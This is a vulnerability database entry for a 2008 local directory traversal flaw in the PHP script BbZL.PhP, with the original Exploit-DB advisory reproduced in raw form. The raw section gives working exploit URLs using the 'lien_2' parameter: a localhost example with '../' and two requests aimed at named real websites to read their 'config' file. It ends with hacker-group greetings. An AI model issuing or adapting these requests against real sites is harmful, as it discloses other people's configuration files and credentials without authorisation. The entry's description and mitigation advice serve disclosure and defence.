Local Directory Traversal

vendor:

BbZL.PhP

by:

jiko

7.5

CVSS

HIGH

Directory Traversal

CWE

Product Name: BbZL.PhP

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

A local directory traversal vulnerability exists in BbZL.PhP, which allows an attacker to access sensitive files outside of the web root directory. This can be exploited by sending a specially crafted HTTP request containing directory traversal characters (e.g. '../') to the vulnerable script. Successful exploitation may lead to the disclosure of sensitive information.

Mitigation:

Ensure that user input is properly sanitized and validated before being used in file operations.

Source

Exploit-DB raw data:

-------------------------------------------------------------------------
  --          JIKI Team [ JIKO + KIl1er ]        ---
-------------------------------------------------------------------------
# Author  : jiko
# email  : jalikom@hotmail.com
# Home   : www.no-back.org
# Script  : BbZL.PhP
# Bug   : Local Directory Traversal
# Download  : http://sylvain.pasquet1.free.fr/index.php?type=1&base=vjek&nom=TÃ©lÃ©chargements
=========================JIkI Team===================
# Exploit  :
 http://localhost/cc/bbzl092/index.php?type=3&lien_2=../
#ex   :
http://sylvain.pasquet1.free.fr/index.php?type=3&lien_2=config
http://barbeuzweb.free.fr/index.php?type=3&lien_2=config
=========================JIKI Team===================
 greetz : all my friend and H-T Team and Stack-Terrorist and Gold_M and all No-back members and tryag.Com
 visit: www.no-back.org & www.tryag.com 
-------------------------------------------------------------------------
  --            JIKI Team [ JIKO + KIl1er ]    --
-------------------------------------------------------------------------

# milw0rm.com [2008-09-28]